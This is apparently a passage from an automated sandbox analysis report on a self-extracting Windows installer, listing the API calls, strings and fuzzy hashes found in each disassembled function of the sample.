GetDesktopWindow.USER32 ref: 00FC314B
SetDlgItemTextA.USER32(?,00000834), ref: 00FC316A
SetWindowTextA.USER32(?,smo), ref: 00FC3176
SetForegroundWindow.USER32(?), ref: 00FC317D
GetDlgItem.USER32(?,00000834), ref: 00FC3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00FC3190
SetWindowLongA.USER32(00000000,000000FC,00FC30C0), ref: 00FC31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00FC31CA

Strings

smo, xrefs: 00FC3170

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: smo
API String ID: 3785188418-2762499640
Opcode ID: 7c642443b6c59fd662c4868ba11db2513d98a6716a4b60c903857461824262a3
Instruction ID: e782e9bd93ae0bd5cf5817f3daec4914be177c5320ad69597d27ec35e1c0fae8
Opcode Fuzzy Hash: 7c642443b6c59fd662c4868ba11db2513d98a6716a4b60c903857461824262a3
Instruction Fuzzy Hash: F411D53190412ABFDB115B249F0FF9A3A64EB467B4F188618F811921E0DBB5AA41FB42

Uniqueness

Uniqueness Score: -1.00%

Function 00FC18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FC18DD), ref: 00FC181A
Part of subcall function 00FC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FC182C
Part of subcall function 00FC17EE: AllocateAndInitializeSid.ADVAPI32(00FC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FC18DD), ref: 00FC1855
Part of subcall function 00FC17EE: FreeSid.ADVAPI32(?,?,?,?,00FC18DD), ref: 00FC1883
Part of subcall function 00FC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00FC18DD), ref: 00FC188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00FC18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00FC18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00FC190A
GetLastError.KERNEL32 ref: 00FC1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00FC192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00FC1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FC1964
EqualSid.ADVAPI32(00000004,?), ref: 00FC197A
FreeSid.ADVAPI32(?), ref: 00FC199C
LocalFree.KERNEL32(00000000), ref: 00FC19A3
CloseHandle.KERNEL32(?), ref: 00FC19AD

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: a10f59c4ff20cf5caa4ba29d97747f7871050a5bb3da6d8ba2c69eb94c6f0b5f
Instruction ID: c79f587a5a4372de2f93dfe83a3bc3bb81714270954b4ebf5953e74c316689e0
Opcode Fuzzy Hash: a10f59c4ff20cf5caa4ba29d97747f7871050a5bb3da6d8ba2c69eb94c6f0b5f
Instruction Fuzzy Hash: 75315A71E0020EAFDB209FA5DE5AFAFBBB8FF05354F100429E545D2151DB30A915EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FC468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
memcpy_s.MSVCRT ref: 00FC46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

Strings

smo, xrefs: 00FC46E4
TITLE, xrefs: 00FC469D, 00FC46C0

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$smo
API String ID: 3370778649-3033500379
Opcode ID: d4c6dba4e85bf08ab05f9c62d780493af325d3e4ba4a95b7afd731a14bca3b45
Instruction ID: 1de5c816200c04de14001982a87fba9aba309a29ba3e9951621c957b72937cff
Opcode Fuzzy Hash: d4c6dba4e85bf08ab05f9c62d780493af325d3e4ba4a95b7afd731a14bca3b45
Instruction Fuzzy Hash: 7F01F93264421D7BF31017A55E0FF6B7E2CDBC6FA5F040018FA4A87180C971A840B6B6

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00FC3490
GetDesktopWindow.USER32 ref: 00FC349A
SetWindowTextA.USER32(?,smo), ref: 00FC34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00FC34C4
SetForegroundWindow.USER32(?), ref: 00FC34CB
EndDialog.USER32(?,00000002), ref: 00FC34D8

Strings

smo, xrefs: 00FC34AC

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: smo
API String ID: 852535152-2762499640
Opcode ID: 8470dc2b359ae4386a0b425ff99e0cbf6e6c4c3b125f1e0fc47a90212a7c5b3b
Instruction ID: 260f25e2a2436d09ca34aae37004670c88181e90ca49bc07bf3178bcfaa5fdcf
Opcode Fuzzy Hash: 8470dc2b359ae4386a0b425ff99e0cbf6e6c4c3b125f1e0fc47a90212a7c5b3b
Instruction Fuzzy Hash: F3019E3264012EABC71E9F69DF0FF6D3A65EB05794F148018F946875A0CA71AF41FB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00FC2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00FC2AF2
CharNextA.USER32(?), ref: 00FC2B12
CharUpperA.USER32 ref: 00FC2B1E
CharPrevA.USER32(?,?), ref: 00FC2B55
CharNextA.USER32(?), ref: 00FC2BD4

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 5cb7549b519e16eb7c29aa8c5e07fa7a6a77c482bca35d225ca547835f91d14c
Instruction ID: a39764e27399e5952c8a20f5822950ee5597b494c24f02e2688f37d8de65fc30
Opcode Fuzzy Hash: 5cb7549b519e16eb7c29aa8c5e07fa7a6a77c482bca35d225ca547835f91d14c
Instruction Fuzzy Hash: 9F41273490824A5EDB599F348E56FFD7B69EF92314F18009EE8C283202DF359E46EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FC43F1
GetWindowRect.USER32(00000000,?), ref: 00FC440B
GetDC.USER32(?), ref: 00FC4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00FC442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FC443A
ReleaseDC.USER32(?,00000000), ref: 00FC4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00FC44A2

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: de20171c92ffed651ff3faffad395ff7b2fa9c90700f363003f274b3a3717644
Instruction ID: 21b75f114274ea4150c374921e3097824ad538776aeec95c5be99e5a6e0baf78
Opcode Fuzzy Hash: de20171c92ffed651ff3faffad395ff7b2fa9c90700f363003f274b3a3717644
Instruction Fuzzy Hash: 15311D72E0011DAFCB14CFB8DE4AEEEBBB5EB89314F254169E805F3250DA306D059B64

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00FC6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC6357

Strings

UPDFILE%lu, xrefs: 00FC62B3, 00FC6329

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 596c0c4425da448784fafae6a4626260f64f6981f315bd95e8199413d6c24629
Instruction ID: fc58e1b5c55627d948a96cdf9892e539b398ff3987a258e6a1fc026364172332
Opcode Fuzzy Hash: 596c0c4425da448784fafae6a4626260f64f6981f315bd95e8199413d6c24629
Instruction Fuzzy Hash: A821D271A0421EABDB109FA48E4BEFE7B78FB45714B14011DF902E3241DB359906ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FC686E
GetSystemMetrics.USER32(0000004A), ref: 00FC68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FC68CC
RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,?,0000000C), ref: 00FC68F4
RegCloseKey.ADVAPI32(?), ref: 00FC6902

Part of subcall function 00FC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00FC691A), ref: 00FC6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00FC68C2

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 1ff67c9a6d402955777b5e36f29dc24d23fc3f63640436990014dba1c8e3396c
Instruction ID: 51e5b321646163da265808a9efb912873a2af21888bc398ec130304394d9ce80
Opcode Fuzzy Hash: 1ff67c9a6d402955777b5e36f29dc24d23fc3f63640436990014dba1c8e3396c
Instruction Fuzzy Hash: 5F316431E0422D9FDB21CB11CE46FAAB7B8FB85768F0401A9E949E7140DB309D85EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F64,?,00000002,00000000), ref: 00FC3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00FC3AB3

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00FC3AD0
LocalFree.KERNEL32 ref: 00FC3B13

Part of subcall function 00FC6517: FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
Part of subcall function 00FC6517: LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
Part of subcall function 00FC6517: DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
Part of subcall function 00FC6517: FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

LocalFree.KERNEL32(00000000,00FC3100,00000000,00000000), ref: 00FC3AF4

Strings

LICENSE, xrefs: 00FC3A46
<None>, xrefs: 00FC3AC5

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 4ab8e48fdb26fd7d690691964f8a1cb1715adaf706537b9e3a9f496ca5f0d6d0
Instruction ID: 595251474f6fb8e00867ffd2b1d6f074aec47fe0670631aa9f00c4135661fc0b
Opcode Fuzzy Hash: 4ab8e48fdb26fd7d690691964f8a1cb1715adaf706537b9e3a9f496ca5f0d6d0
Instruction Fuzzy Hash: C611067660020AABD724AF32AF0BF1779B9EBC5790B10802EB542D71A1DA7D9C10B721

Uniqueness

Uniqueness Score: -1.00%

Function 00FC24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00FC2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00FC252C
_lopen.KERNEL32(?,00000040), ref: 00FC253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00FC254C
_lclose.KERNEL32(00000000), ref: 00FC2555

Strings

wininit.ini, xrefs: 00FC2510

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 7f14184d7af3953a3b7ed43888ae5d16896e1de4b243660f071ebe291718c89a
Instruction ID: a08bcba15411cc0595b657952e4ebf026e3224599309b9d328c2acb2cb3360a7
Opcode Fuzzy Hash: 7f14184d7af3953a3b7ed43888ae5d16896e1de4b243660f071ebe291718c89a
Instruction Fuzzy Hash: 9A01F536A4011C67C7209B659E0EEDFBB7CEB457A0F000168FA49D3190DE749E45DA91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00FC3723
MessageBeep.USER32(00000000), ref: 00FC39C3
MessageBoxA.USER32(00000000,00000000,smo,00000030), ref: 00FC39F1

Strings

smo, xrefs: 00FC39E9, 00FC3A19
3, xrefs: 00FC3785

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$smo
API String ID: 2519184315-1411035656
Opcode ID: 406b670e8725056ba855f7a4d792255edfcba5f57868c067480cb0b7fa431f2c
Instruction ID: 413a0c71654437a5b31aaa859bef6875b2b6c72fd902c12892d06408d51fdbc4
Opcode Fuzzy Hash: 406b670e8725056ba855f7a4d792255edfcba5f57868c067480cb0b7fa431f2c
Instruction Fuzzy Hash: CC910372E052269BDB348A15CF83FAA73B1AF45394F1580ADD84A97281D7748F81FF01

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00FC64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00FC64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00FC6502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC64AC
advpack.dll, xrefs: 00FC64C2, 00FC64CD, 00FC6501

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-3680919256
Opcode ID: f85be24ba09563ce774685779446adfb91d30f47eb9f671c6efe24439a8de27d
Instruction ID: f960f29c1252f3082d94311d05ae9fa76f71575612fdbbd33c30d9b427fe3f04
Opcode Fuzzy Hash: f85be24ba09563ce774685779446adfb91d30f47eb9f671c6efe24439a8de27d
Instruction Fuzzy Hash: 1501263094810D9BD710DB60DE4BFEA7338EB51310F50019DF485D30C0DF74AE8AAA01

Uniqueness

Uniqueness Score: -1.00%

Function 00FC28E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00FC2A6F

Part of subcall function 00FC2773: CharUpperA.USER32(CD01772F,00000000,00000000,00000000), ref: 00FC27A8
Part of subcall function 00FC2773: CharNextA.USER32(0000054D), ref: 00FC27B5
Part of subcall function 00FC2773: CharNextA.USER32(00000000), ref: 00FC27BC
Part of subcall function 00FC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2829
Part of subcall function 00FC2773: RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2852
Part of subcall function 00FC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2870
Part of subcall function 00FC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00FC3938,?,?,?,?,-00000005), ref: 00FC2958
GlobalLock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FC3938,?,?,?,?,-00000005,?), ref: 00FC2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FC3938,?,?,?,?,-00000005,?), ref: 00FC2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00FC2A81

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: f010f21b1a88c294563d4278e41fef36f372d2207d6d708992ec8e0c2999efc4
Instruction ID: bd76eb01a8b2a51cfaa92422e285a3b09e9810fa0ab20cea3ed8dfb2078890b6
Opcode Fuzzy Hash: f010f21b1a88c294563d4278e41fef36f372d2207d6d708992ec8e0c2999efc4
Instruction Fuzzy Hash: BE514A31D0021ADBCB61CF98CA86EAEBBB5FF48714F14412EE805E3211DB359941EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00FC30B4), ref: 00FC4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00FC30B4), ref: 00FC41E7

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
